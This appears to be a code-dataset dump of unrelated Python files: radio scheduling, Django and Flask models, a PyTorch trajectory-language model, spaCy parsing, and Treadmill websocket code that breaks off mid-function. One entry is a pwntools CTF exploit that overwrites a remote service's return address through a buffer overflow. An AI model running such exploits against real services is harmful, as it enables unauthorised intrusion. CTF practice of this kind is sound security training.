text stringlengths 8 6.05M |
|---|
#!/usr/bin/python
"""
m802_DSCsched.py
A script to power up and configure an IC-M802 for a DSC sked. ENSURE YOUR RADIO IS IN DSC WATCH MODE AND THEN TURNED OFF BEFORE YOU RUN THIS SCRIPT.
Created by Mark Pitman of sv Tuuletar and Mike Reynolds of sv Zen Again (vk6hsr@gmail.com)
This script requires the following python libraries to be installed:
* apscheduler (pip install apscheduler)
* python-serial (sudo apt-get install python-serial)
"""
from apscheduler.schedulers.blocking import BlockingScheduler
import serial
import time
import os
ser=serial.Serial(port='/dev/icom802', baudrate=4800, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=10)
START_HOURS = '0-23'
STOP_HOURS = '0-23'
START_MINS = '0,30'
STOP_MINS = '1,31'
def do_checksum(payload):
ba = bytearray()
cs = 0
ba.extend(payload)
for b in ba:
cs = cs ^ b
return format(cs, '02x')
def do_sentence(payload):
checksum = do_checksum(payload)
command = "$" + payload + "*" + checksum.upper()
print("# Command: " + command)
ser.write(command + "\r\n")
response = ser.readline()
print("# Response: " + response[:-2])
return response
def start_radio():
print "Starting ICOM-M802"
ser.close(); ser.open()
do_sentence("STARTUP")
def stop_radio():
print("Closing connection to ICOM-M802")
ser.close()
if __name__ == "__main__":
sched = BlockingScheduler()
print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))
# Schedules job_function to be run for 1 minute on the hour and half-hour
sched.add_job(start_radio, 'cron', hour=START_HOURS, minute=START_MINS, timezone='utc')
sched.add_job(stop_radio, 'cron', hour=STOP_HOURS, minute=STOP_MINS, timezone='utc')
print('The following schedule is currently defined:')
print(' - Radio turning ON at HOURS: %s MINS: %s'%(START_HOURS, START_MINS))
print(' - Radio turning OFF at HOURS: %s MINS: %s'%(STOP_HOURS, STOP_MINS))
try:
print('Starting schedule NOW')
sched.start()
except (KeyboardInterrupt, SystemExit):
pass |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
class User(models.Model):
acct_name = models.CharField(max_length=24) # primary_key=True "id" field is default
first_name = models.CharField(max_length=24)
last_name = models.CharField(max_length=24)
def __str__(self):
return('%s: %s %s' % (self.acct_name, self.first_name, self.last_name))
class Permission(models.Model):
permission_name = models.CharField(max_length=80)
def __str__(self):
return(self.permission_name)
class Role(models.Model):
role_name = models.CharField(max_length=80)
users = models.ManyToManyField(User)
permissions = models.ManyToManyField(Permission)
def __str__(self):
return(self.role_name)
|
from data_multiview import Data, PadBatch
import pickle
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
import torch.optim as optim
import numpy as np
from sklearn.metrics import confusion_matrix
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch.utils.tensorboard import SummaryWriter
from scipy.stats import spearmanr
VOCAB_SIZE = 264
def lstm_helper(sequences, lengths, lstm):
if len(sequences) == 1:
output, (hidden, _) = lstm(sequences)
return output, hidden[-1]
ordered_len, ordered_idx = lengths.sort(0, descending=True)
ordered_sequences = sequences[ordered_idx]
# remove zero lengths
try:
nonzero = list(ordered_len).index(0)
except ValueError:
nonzero = len(ordered_len)
sequences_packed = pack_padded_sequence(
ordered_sequences[:nonzero], ordered_len[:nonzero],
batch_first=True)
output_nonzero, (hidden_nonzero, _) = lstm(sequences_packed)
output_nonzero = pad_packed_sequence(output_nonzero, batch_first=True)[0]
max_len = sequences.shape[1]
max_len_true = output_nonzero.shape[1]
output = torch.zeros(len(sequences), max_len, output_nonzero.shape[-1])
output_final = torch.zeros(len(sequences), max_len, output_nonzero.shape[-1])
output[:nonzero, :max_len_true, :] = output_nonzero
hidden = torch.zeros(len(sequences), hidden_nonzero.shape[-1])
hidden_final = torch.zeros(len(sequences), hidden_nonzero.shape[-1])
hidden[:nonzero, :] = hidden_nonzero[-1]
output_final[ordered_idx] = output
hidden_final[ordered_idx] = hidden
return output_final.cuda(), hidden_final.cuda()
class ImgEnc(nn.Module):
def __init__(self, args):
super().__init__()
self.args = args
self.encoder = nn.Sequential(
# nn.BatchNorm2d(3),
nn.Conv2d(3, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
# nn.BatchNorm2d(args.n_channels),
nn.Conv2d(args.n_channels, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
# nn.BatchNorm2d(args.n_channels),
nn.Conv2d(args.n_channels, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Flatten(),
nn.Linear(4*4*args.n_channels, args.img_enc_size),
# nn.Dropout(),
nn.Linear(args.img_enc_size, args.img_enc_size),
)
def forward(self, x):
return self.encoder(x)
class Model(nn.Module):
def __init__(self, args):
super().__init__()
self.args = args
'''
# image encoder
self.img_enc = nn.Sequential(
# nn.BatchNorm2d(3),
nn.Conv2d(3, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
# nn.BatchNorm2d(args.n_channels),
nn.Conv2d(args.n_channels, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
# nn.BatchNorm2d(args.n_channels),
nn.Conv2d(args.n_channels, args.n_channels, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Flatten(),
nn.Linear(4*4*args.n_channels, args.img_enc_size),
# nn.Dropout(),
nn.Linear(args.img_enc_size, args.img_enc_size),
)
'''
self.img_enc_right = ImgEnc(args)
self.img_enc_left = ImgEnc(args)
self.img_enc_center = ImgEnc(args)
# trajectory encoder
self.traj_encoder = nn.LSTM(3 * args.img_enc_size, args.img_enc_size, batch_first=True, num_layers=args.num_layers)
# language encoder
self.embedding = nn.Embedding(VOCAB_SIZE, args.lang_enc_size)
self.descr_encoder = nn.LSTM(args.lang_enc_size, args.lang_enc_size, batch_first=True, num_layers=args.num_layers)
# linear layers
self.linear1 = nn.Linear(args.img_enc_size + args.lang_enc_size, args.classifier_size)
self.linear2 = nn.Linear(args.classifier_size, 1)
def forward(self, traj_right, traj_left, traj_center, lang, traj_len, lang_len):
traj_right_enc = self.img_enc_right(traj_right.view(-1, *traj_right.shape[-3:]))
traj_right_enc = traj_right_enc.view(*traj_right.shape[:2], -1)
traj_left_enc = self.img_enc_left(traj_left.view(-1, *traj_left.shape[-3:]))
traj_left_enc = traj_left_enc.view(*traj_left.shape[:2], -1)
traj_center_enc = self.img_enc_center(traj_center.view(-1, *traj_center.shape[-3:]))
traj_center_enc = traj_center_enc.view(*traj_center.shape[:2], -1)
traj_enc = torch.cat([traj_right_enc, traj_left_enc, traj_center_enc], dim=-1)
_, traj_enc = lstm_helper(traj_enc, traj_len, self.traj_encoder)
lang_emb = self.embedding(lang)
_, lang_enc = lstm_helper(lang_emb, lang_len, self.descr_encoder)
traj_lang = torch.cat([traj_enc, lang_enc], dim=-1)
# traj_lang = F.dropout(traj_lang)
pred = F.relu(self.linear1(traj_lang))
# pred = F.dropout(pred)
pred = self.linear2(pred)
return pred, lang_emb
class Predict:
def __init__(self, model_file, lr, n_updates):
# from argparse import Namespace
# args = Namespace(n_channels=64, img_enc_size=128, lang_enc_size=128, classifier_size=512, num_layers=2)
# args = Namespace(n_channels=512, img_enc_size=512, lang_enc_size=512, classifier_size=1024, num_layers=1)
ckpt = torch.load(model_file)
self.args = ckpt['args']
self.model = Model(self.args).cuda()
self.model.load_state_dict(ckpt['state_dict'])
self.model.eval()
self.optimizer = optim.Adam(
self.model.parameters(),
lr=lr,
weight_decay=0.)
self.n_updates = n_updates
def predict_scores(self, traj, lang, traj_len, lang_len):
self.model.eval()
scores = np.zeros((len(traj), len(traj)))
for start in range(len(traj)):
for end in range(start+1, len(traj)):
traj_sampled = traj[start:end, :, :, :]
traj_sampled = np.array(traj_sampled)
traj_sampled = torch.from_numpy(traj_sampled)
traj_sampled = traj_sampled.cuda().float()
traj_sampled = torch.transpose(traj_sampled, 2, 3)
traj_sampled = torch.transpose(traj_sampled, 1, 2)
lang = lang.cuda().long()
traj_len = torch.Tensor([end-start])
lang_len = torch.Tensor(lang_len)
prob = self.model(torch.unsqueeze(traj_sampled, 0), torch.unsqueeze(lang, 0), traj_len, lang_len)
prob_norm = torch.softmax(prob, dim=-1).data.cpu().numpy()
scores[start, end] = (prob_norm[0, 1] - prob_norm[0, 0])
return scores
def predict_test(self, traj_right, traj_left, traj_center, lang, traj_len, lang_len):
self.model.train()
traj_right_sampled = traj_right
traj_right_sampled = np.array(traj_right_sampled)
traj_right_sampled = torch.from_numpy(traj_right_sampled)
traj_right_sampled = traj_right_sampled.cuda().float()
traj_right_sampled = torch.transpose(traj_right_sampled, 3, 4)
traj_right_sampled = torch.transpose(traj_right_sampled, 2, 3)
traj_left_sampled = traj_left
traj_left_sampled = np.array(traj_left_sampled)
traj_left_sampled = torch.from_numpy(traj_left_sampled)
traj_left_sampled = traj_left_sampled.cuda().float()
traj_left_sampled = torch.transpose(traj_left_sampled, 3, 4)
traj_left_sampled = torch.transpose(traj_left_sampled, 2, 3)
traj_center_sampled = traj_center
traj_center_sampled = np.array(traj_center_sampled)
traj_center_sampled = torch.from_numpy(traj_center_sampled)
traj_center_sampled = traj_center_sampled.cuda().float()
traj_center_sampled = torch.transpose(traj_center_sampled, 3, 4)
traj_center_sampled = torch.transpose(traj_center_sampled, 2, 3)
lang = lang.cuda().long()
traj_len = torch.Tensor(traj_len)
lang_len = torch.Tensor(lang_len)
prob, lang_emb = self.model(traj_right_sampled, traj_left_sampled, traj_center_sampled, lang, traj_len, lang_len)
return prob, lang_emb
def predict(self, traj_right, traj_left, traj_center, lang):
self.model.eval()
with torch.no_grad():
traj_right_sampled = traj_right[::-1][::10][::-1]
traj_right_sampled = np.array(traj_right_sampled)
traj_right_sampled = torch.from_numpy(traj_right_sampled)
traj_right_sampled = traj_right_sampled.cuda().float()
traj_right_sampled = torch.transpose(traj_right_sampled, 2, 3)
traj_right_sampled = torch.transpose(traj_right_sampled, 1, 2)
traj_left_sampled = traj_left[::-1][::10][::-1]
traj_left_sampled = np.array(traj_left_sampled)
traj_left_sampled = torch.from_numpy(traj_left_sampled)
traj_left_sampled = traj_left_sampled.cuda().float()
traj_left_sampled = torch.transpose(traj_left_sampled, 2, 3)
traj_left_sampled = torch.transpose(traj_left_sampled, 1, 2)
traj_center_sampled = traj_center[::-1][::10][::-1]
traj_center_sampled = np.array(traj_center_sampled)
traj_center_sampled = torch.from_numpy(traj_center_sampled)
traj_center_sampled = traj_center_sampled.cuda().float()
traj_center_sampled = torch.transpose(traj_center_sampled, 2, 3)
traj_center_sampled = torch.transpose(traj_center_sampled, 1, 2)
lang = lang.cuda().long()
traj_len = torch.Tensor([len(traj_right_sampled)])
lang_len = torch.Tensor([len(lang)])
prob = self.model(torch.unsqueeze(traj_right_sampled, 0) / 255., torch.unsqueeze(traj_left_sampled, 0) / 255., \
torch.unsqueeze(traj_center_sampled, 0) / 255., torch.unsqueeze(lang, 0), traj_len, lang_len)
return prob
def update(self, traj_r, traj_l, traj_c, lang, label):
self.model.train()
traj_len = min(150, len(traj_r))
traj_r = torch.from_numpy(np.array(traj_r[:traj_len]))
traj_r = torch.transpose(traj_r, 2, 3)
traj_r = torch.transpose(traj_r, 1, 2)
traj_l = torch.from_numpy(np.array(traj_l[:traj_len]))
traj_l = torch.transpose(traj_l, 2, 3)
traj_l = torch.transpose(traj_l, 1, 2)
traj_c = torch.from_numpy(np.array(traj_c[:traj_len]))
traj_c = torch.transpose(traj_c, 2, 3)
traj_c = torch.transpose(traj_c, 1, 2)
lang = lang.cuda().long()
lang_len = torch.Tensor([len(lang)])
label = torch.Tensor([2*label - 1]).cuda()
for _ in range(self.n_updates):
while True:
selected = np.random.random(traj_len) > 0.9
if np.sum(selected) > 0:
break
traj_r_ = traj_r[selected].cuda().float()
traj_l_ = traj_l[selected].cuda().float()
traj_c_ = traj_c[selected].cuda().float()
traj_len_ = torch.Tensor([len(traj_r_)])
self.optimizer.zero_grad()
prob = self.model(
torch.unsqueeze(traj_r_, 0) / 255.,
torch.unsqueeze(traj_l_, 0) / 255.,
torch.unsqueeze(traj_c_, 0) / 255.,
torch.unsqueeze(lang, 0),
traj_len_, lang_len)[:, 0]
loss = torch.nn.MSELoss()(prob, label)
loss.backward()
self.optimizer.step()
class Train:
def __init__(self, args, train_data_loader, valid_data_loader):
self.args = args
self.model = Model(args).cuda()
self.train_data_loader = train_data_loader
self.valid_data_loader = valid_data_loader
params_img_enc = list(self.model.img_enc_right.parameters()) + list(self.model.img_enc_left.parameters()) + list(self.model.img_enc_center.parameters())
params_lang_enc = list(self.model.embedding.parameters()) + list(self.model.descr_encoder.parameters())
params_rest = list(filter(lambda kv: 'img_enc' not in kv[0] and 'embedding' not in kv[0] and 'descr_enc' not in kv[0], self.model.named_parameters()))
params_rest = list(map(lambda x: x[1], params_rest))
self.optimizer_img_enc = optim.Adam(
# self.model.parameters(),
params_img_enc,
lr=self.args.lr_img_enc,
weight_decay=self.args.weight_decay)
self.optimizer_lang_enc = optim.Adam(
params_lang_enc,
# self.model.parameters(),
lr=self.args.lr_lang_enc,
weight_decay=self.args.weight_decay)
self.optimizer_rest = optim.Adam(
params_rest,
# self.model.parameters(),
lr=self.args.lr_rest,
weight_decay=self.args.weight_decay)
# tensorboard
if args.logdir:
self.writer = SummaryWriter(log_dir=args.logdir)
self.global_step = 0
def run_batch(self, traj_right, traj_left, traj_center, lang, traj_len, lang_len, labels, weights, is_train):
if is_train:
self.model.train()
self.optimizer_img_enc.zero_grad()
self.optimizer_lang_enc.zero_grad()
self.optimizer_rest.zero_grad()
else:
self.model.eval()
traj_right = traj_right.cuda().float()
traj_left = traj_left.cuda().float()
traj_center = traj_center.cuda().float()
lang = lang.cuda().long()
labels = torch.Tensor(labels).cuda().long()
weights = weights.cuda().float()
prob = torch.tanh(self.model(traj_right, traj_left, traj_center, lang, traj_len, lang_len))[:, 0]
loss = torch.nn.MSELoss()(prob, weights*labels)
'''
loss = torch.nn.CrossEntropyLoss(reduction='none')(prob, labels)
loss = torch.mean(weights * loss)
pred = torch.argmax(prob, dim=-1)
pred = torch.sign(prob)
'''
pred = prob
if is_train:
loss.backward()
self.optimizer_img_enc.step()
self.optimizer_lang_enc.step()
self.optimizer_rest.step()
# tensorboard
if self.args.logdir:
self.global_step += 1
if self.global_step % 100 == 0:
for tag, value in self.model.named_parameters():
tag = tag.replace('.', '/')
self.writer.add_histogram(tag, value.data.cpu().numpy(), self.global_step)
self.writer.add_histogram(tag+'/grad', value.grad.data.cpu().numpy(), self.global_step)
return pred, loss.item()
def run_epoch(self, data_loader, is_train):
pred_all = []
labels_all = []
loss_all = []
for frames_right, frames_left, frames_center, descr, descr_enc, traj_len, descr_len, labels, _, _, weights in data_loader:
pred, loss = self.run_batch(frames_right, frames_left, frames_center, descr_enc, traj_len, descr_len, labels, weights, is_train)
pred_all += pred.tolist()
labels_all += (weights * labels).tolist()
loss_all.append(loss)
# correct = [1.0 if x == y else 0.0 for (x, y) in zip(pred_all, labels_all)]
t, p = spearmanr(pred_all, labels_all)
# conf_mat = confusion_matrix(labels_all, pred_all)
return np.round(np.mean(loss_all), 2), t, None
def train_model(self):
best_val_acc = 0.
epoch = 1
while True:
# self.valid_data_loader.dataset.set_thresh(min(0.5, epoch / 100.))
# self.train_data_loader.dataset.set_thresh(min(0.5, epoch / 100.))
valid_loss, valid_acc, valid_cm = self.run_epoch(self.valid_data_loader, is_train=False)
train_loss, train_acc, train_cm = self.run_epoch(self.train_data_loader, is_train=True)
# print(train_cm)
# print(valid_cm)
print('Epoch: {}\tTL: {:.2f}\tTA: {:.2f}\tVL: {:.2f}\tVA: {:.2f}'.format(
epoch, train_loss, 100. * train_acc, valid_loss, 100. * valid_acc))
if valid_acc > best_val_acc:
best_val_acc = valid_acc
if self.args.save_path:
state = {
'args': self.args,
'epoch': epoch,
'best_val_acc': best_val_acc,
'state_dict': self.model.state_dict(),
# 'optimizer': self.optimizer.state_dict()
}
torch.save(state, self.args.save_path)
if epoch == self.args.max_epochs:
break
epoch += 1
def main(args):
train_data = Data(mode='train', sampling=args.sampling, prefix=args.prefix)
valid_data = Data(mode='valid', sampling=args.sampling, prefix=args.prefix)
print(len(train_data))
print(len(valid_data))
train_data_loader = DataLoader(
dataset=train_data,
batch_size=args.batch_size,
shuffle=True,
collate_fn=PadBatch(),
num_workers=16)
valid_data_loader = DataLoader(
dataset=valid_data,
batch_size=args.batch_size,
shuffle=True,
collate_fn=PadBatch(),
num_workers=16)
Train(args, train_data_loader, valid_data_loader).train_model()
def get_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--batch-size', type=int, default=16)
parser.add_argument('--n-channels', type=int, default=64)
parser.add_argument('--img-enc-size', type=int, default=128)
parser.add_argument('--lang-enc-size', type=int, default=128)
parser.add_argument('--classifier-size', type=int, default=512)
parser.add_argument('--num-layers', type=int, default=2)
parser.add_argument('--max-epochs', type=int, default=0)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--lr-img-enc', type=float, default=1e-4)
parser.add_argument('--lr-lang-enc', type=float, default=1e-4)
parser.add_argument('--lr-rest', type=float, default=1e-4)
parser.add_argument('--weight-decay', type=float, default=0.)
parser.add_argument('--save-path', default=None)
parser.add_argument('--logdir', default=None)
parser.add_argument('--sampling', default='random')
parser.add_argument('--prefix', action='store_true')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = get_args()
main(args)
|
# Generated by Django 2.2.1 on 2019-07-12 14:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Tags',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=20, unique=True)),
('slug', models.SlugField(max_length=20, unique=True)),
],
),
migrations.CreateModel(
name='Posts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, unique=True)),
('slug', models.SlugField(max_length=100, unique=True)),
('body', models.TextField(max_length=255)),
('create_date', models.DateTimeField(default=django.utils.timezone.now)),
('autor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('tags', models.ManyToManyField(blank=True, related_name='posts', to='blog.Tags')),
],
options={
'ordering': ['-create_date'],
},
),
migrations.CreateModel(
name='Comments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_date', models.DateTimeField(default=django.utils.timezone.now)),
('comment', models.TextField(max_length=255)),
('author', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, to=settings.AUTH_USER_MODEL)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Posts')),
],
options={
'ordering': ['-create_date'],
},
),
]
|
import uuid
from app.main import db, flask_bcrypt
class Alumni(db.Model):
__tablename__ = "alumni"
alumni_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
alumni_uuid = db.Column(db.String(50), unique=True)
odoo_contact_id = db.Column(db.String(50), unique=True, nullable=False)
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
user_confirmed = db.Column(db.Boolean())
allow_show_contacts = db.Column(db.Boolean())
update_form = db.relationship("UpdateForm", back_populates="alumni")
def __init__(self, odoo_contact_id, email, password, allow_show_contacts):
self.alumni_uuid = str(uuid.uuid4())
self.odoo_contact_id = odoo_contact_id
self.email = email
self.password = flask_bcrypt.generate_password_hash(password).decode()
self.user_confirmed = False
self.allow_show_contacts = allow_show_contacts
def check_password(self, password):
return flask_bcrypt.check_password_hash(self.password, password)
|
from cookiecutter.main import cookiecutter
import os
import psutil
import pkg_resources
def process(args):
# Create project from the cookiecutter-pypackage/ template
extra_context = {
'publish_host': os.uname()[1],
'docker_host_cache_dir': os.path.join(os.getcwd(), 'cache',),
'docker_host_publish_dir': os.path.join(os.getcwd(), 'publish'),
'cache_dir': os.path.join(os.getcwd(), 'cache',),
'publish_dir': os.path.join(os.getcwd(), 'publish'),
'twice_no_of_cores': psutil.cpu_count() * 2,
}
template = args.source + '-docker' if args.container else args.source
template_dir = os.path.join(
pkg_resources.resource_filename('ronto', 'data/'), template)
cookiecutter(template_dir, extra_context=extra_context)
def add_command(subparser):
parser = subparser.add_parser(
"bootstrap",
help="""
Create a new Yocto build project from scratch. You will
be asked a couple of questions and end up with a ronto.yml
file and an optional site.conf file
""",
)
parser.add_argument('-s', '--source', choices=[ 'repo', 'git', 'ignore' ],
default='git',
help="""
Select how build configuration sources are maintained:
repo - via google repo tool
git - by a set of git repositories
ignore - ronto does not take care for sources
Default is git
""")
parser.add_argument('-c', '--container', action='store_true',
help="Run in docker container")
parser.set_defaults(func=process)
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
#context.log_level = 'debug'
def main():
elf = ELF('./magic')
# libc = ELF('')
proc = remote('bamboofox.cs.nctu.edu.tw', 10000)
# proc = elf.process()
#log.debug('You may attatch this process to gdb now.')
#raw_input()
proc.recvuntil(': ')
proc.sendline(b'aaaa')
proc.recvuntil(': ')
# Do not use elf.sym['never_use'], the resulting bytes
# contain a '\x0d' which will cut all subsequent bytes off...
payload = 4 * b'\x00' + 68 * b'A' # padding
payload += p32(0x8048613) # ret
proc.sendline(payload)
proc.interactive()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# @Author: Sean
# @Date: 2016-03-29 21:44:28
# @Last Modified by: Seanli310
# @Last Modified time: 2016-04-12 22:46:33
from spacy.en import English, LOCAL_DATA_DIR
import spacy.en
import os
import preprocessing
import sys
def dependency_labels_to_root(token):
'''Walk up the syntactic tree, collecting the arc labels.'''
dep_labels = []
while token.head is not token:
dep_labels.append(token.dep)
token = token.head
return dep_labels
f = open('../../data/set1/a1.txt','r')
doc = []
for line in f.readlines():
line = line.strip().lower()
doc.append(line);
data_dir = os.environ.get('SPACY_DATA', LOCAL_DATA_DIR)
nlp = English(parser=True, tagger=True, entity=True)
d = preprocessing.docToString(sys.argv[1])
d = d.decode('ascii','ignore')
doc4 = nlp(d);
for sen in doc4.sents:
t = []
for token in sen:
t.append('['+str(token)+'_'+str(token.pos_)+'_'+str(token.tag_)+']')
tmp = dependency_labels_to_root(token)
print " ".join(t) #token, token.tag_,token.head #token.prob, token.cluster, token.head, token.ent_iob, tmp, 'token.pos:', token.pos_, 'token.lemma:', token.lemma_,
#for i in tmp:
# print nlp.vocab.strings[int(i)]
# nlp is the package
# vocab is a Dict of vocabulary inside the nlp
# .prob is used to get the probability of a word.
nlp.vocab[u'quietly'].prob
#ID and String
hello_id = nlp.vocab.strings['Hello']
hello_str = nlp.vocab.strings[hello_id]
|
"""Websocket API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import errno
import fnmatch
import glob
import heapq
import io
import json
import logging
import os
import re
import sqlite3
import threading
import time
import uuid
import tornado.websocket
import six
from six.moves import urllib_parse
from treadmill import dirwatch
from treadmill import utils
_LOGGER = logging.getLogger(__name__)
def make_handler(pubsub):
"""Make websocket handler factory."""
class _WS(tornado.websocket.WebSocketHandler):
"""Base class contructor"""
def __init__(self, application, request, **kwargs):
"""Default constructor for tornado.websocket.WebSocketHandler"""
tornado.websocket.WebSocketHandler.__init__(
self, application, request, **kwargs
)
self._request_id = str(uuid.uuid4())
self._subscriptions = set()
def active(self, sub_id=None):
"""Return true if connection (and optional subscription) is active,
false otherwise.
If connection is not active, so are all of its subscriptions.
"""
if not self.ws_connection:
return False
return sub_id is None or sub_id in self._subscriptions
def open(self, *args, **kwargs):
"""Called when connection is opened.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection opened, remote ip: %s',
self._request_id, self.request.remote_ip)
def send_msg(self, msg):
"""Send message."""
_LOGGER.info('[%s] Sending message: %r', self._request_id, msg)
try:
self.write_message(msg)
except Exception: # pylint: disable=W0703
_LOGGER.exception('[%s] Error sending message: %r',
self._request_id, msg)
def send_error_msg(self, error_str, sub_id=None, close_conn=True):
"""Convenience method for logging and returning errors.
If sub_id is provided, it will be included in the error message and
subscription will be removed.
Note: this method will close the connection after sending back the
error, unless close_conn=False.
"""
error_msg = {'_error': error_str,
'when': time.time()}
if sub_id is not None:
error_msg['sub-id'] = sub_id
_LOGGER.info('[%s] Removing subscription %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
pass
self.send_msg(error_msg)
if close_conn:
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
def on_close(self):
"""Called when connection is closed.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection closed.', self._request_id)
def check_origin(self, origin):
"""Overriding check_origin method from base class.
This method returns true all the time.
"""
parsed_origin = urllib_parse.urlparse(origin)
_LOGGER.debug('parsed_origin: %r', parsed_origin)
return True
def on_message(self, message):
"""Manage event subscriptions."""
if not pubsub:
_LOGGER.fatal('pubsub is not configured, ignore.')
self.send_error_msg('Fatal: unexpected error', close_conn=True)
_LOGGER.info('[%s] Received message: %s',
self._request_id, message)
sub_id = None
close_conn = True
try:
sub_msg = json.loads(message)
sub_id = sub_msg.get('sub-id')
close_conn = sub_id is None
if sub_msg.get('unsubscribe') is True:
_LOGGER.info('[%s] Unsubscribing %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
self.send_error_msg(
'Invalid subscription: %s' % sub_id,
close_conn=False
)
return
if sub_id and sub_id in self._subscriptions:
self.send_error_msg(
'Subscription already exists: %s' % sub_id,
close_conn=False
)
return
topic = sub_msg.get('topic')
impl = pubsub.impl.get(topic)
if not impl:
self.send_error_msg(
'Invalid topic: %s' % topic,
sub_id=sub_id, close_conn=close_conn
)
return
subscription = impl.subscribe(sub_msg)
since = sub_msg.get('since', 0)
snapshot = sub_msg.get('snapshot', False)
if sub_id and not snapshot:
_LOGGER.info('[%s] Adding subscription %s',
self._request_id, sub_id)
self._subscriptions.add(sub_id)
for watch, pattern in subscription:
pubsub.register(watch, pattern, self, impl, since, sub_id)
if snapshot and close_conn:
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
except Exception as err: # pylint: disable=W0703
self.send_error_msg(str(err),
sub_id=sub_id, close_conn=close_conn)
def data_received(self, chunk):
"""Passthrough of abstract method data_received"""
pass
def on_event(self, filename, operation, _content):
"""Default event handler."""
_LOGGER.debug('%s %s', filename, operation)
return {'time': time.time(),
'filename': filename,
'op': operation}
return _WS
class DirWatchPubSub(object):
"""Pubsub dirwatch events."""
def __init__(self, root, impl=None, watches=None):
self.root = os.path.realpath(root)
self.impl = impl or {}
self.watches = watches or []
self.watcher = dirwatch.DirWatcher()
self.watcher.on_created = self._on_created
self.watcher.on_deleted = self._on_deleted
self.watcher.on_modified = self._on_modified
self.watch_dirs = set()
for watch in self.watches:
watch_dirs = self._get_watch_dirs(watch)
self.watch_dirs.update(watch_dirs)
for directory in self.watch_dirs:
_LOGGER.info('Added permanent dir watcher: %s', directory)
self.watcher.add_dir(directory)
self.ws = make_handler(self)
self.handlers = collections.defaultdict(list)
def register(self, watch, pattern, ws_handler, impl, since, sub_id=None):
"""Register handler with pattern."""
watch_dirs = self._get_watch_dirs(watch)
for directory in watch_dirs:
if ((not self.handlers[directory] and
directory not in self.watch_dirs)):
_LOGGER.info('Added dir watcher: %s', directory)
self.watcher.add_dir(directory)
# Store pattern as precompiled regex.
pattern_re = re.compile(
fnmatch.translate(pattern)
)
self.handlers[directory].append(
(pattern_re, ws_handler, impl, sub_id)
)
self._sow(watch, pattern, since, ws_handler, impl, sub_id=sub_id)
def _get_watch_dirs(self, watch):
pathname = os.path.realpath(os.path.join(self.root, watch.lstrip('/')))
return [path for path in glob.glob(pathname) if os.path.isdir(path)]
@utils.exit_on_unhandled
def _on_created(self, path):
"""On file created callback."""
_LOGGER.debug('created: %s', path)
self._handle('c', path)
@utils.exit_on_unhandled
def _on_modified(self, path):
"""On file modified callback."""
_LOGGER.debug('modified: %s', path)
self._handle('m', path)
@utils.exit_on_unhandled
def _on_deleted(self, path):
"""On file deleted callback."""
_LOGGER.debug('deleted: %s', path)
self._handle('d', path)
def _handle(self, operation, path):
"""Get event data and notify interested handlers of the change."""
directory, filename = os.path.split(path)
# Ignore (.) files, as they are temporary or "system".
if filename[0] == '.':
return
directory_handlers = self.handlers.get(directory, [])
handlers = [
(handler, impl, sub_id)
for pattern_re, handler, impl, sub_id in directory_handlers
if (handler.active(sub_id=sub_id) and
pattern_re.match(filename))
]
if not handlers:
return
if operation == 'd':
when = time.time()
content = None
else:
if '/trace/' in path:
# Specialized handling of trace files (no need to stat/read).
# If file was already deleted (trace cleanup), don't ignore it.
_, timestamp, _ = filename.split(',', 2)
when, content = float(timestamp), ''
else:
try:
when = os.stat(path).st_mtime
with io.open(path) as f:
content = f.read()
except (IOError, OSError) as err:
if err.errno == errno.ENOENT:
# If file was already deleted, ignore.
# It will be handled as 'd'.
return
raise
self._notify(handlers, path, operation, content, when)
def _notify(self, handlers, path, operation, content, when):
"""Notify interested handlers of the change."""
root_len = len(self.root)
for handler, impl, sub_id in handlers:
try:
payload = impl.on_event(path[root_len:],
operation,
content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=broad-except
_LOGGER.exception('Error handling event: %s, %s, %s, %s, %s',
path, operation, content, when, sub_id)
handler.send_error_msg(
'{cls}: {err}'.format(
cls=type(err).__name__,
err=str(err)
),
sub_id=sub_id,
close_conn=sub_id is None
)
def _db_records(self, db_path, sow_table, watch, pattern, since):
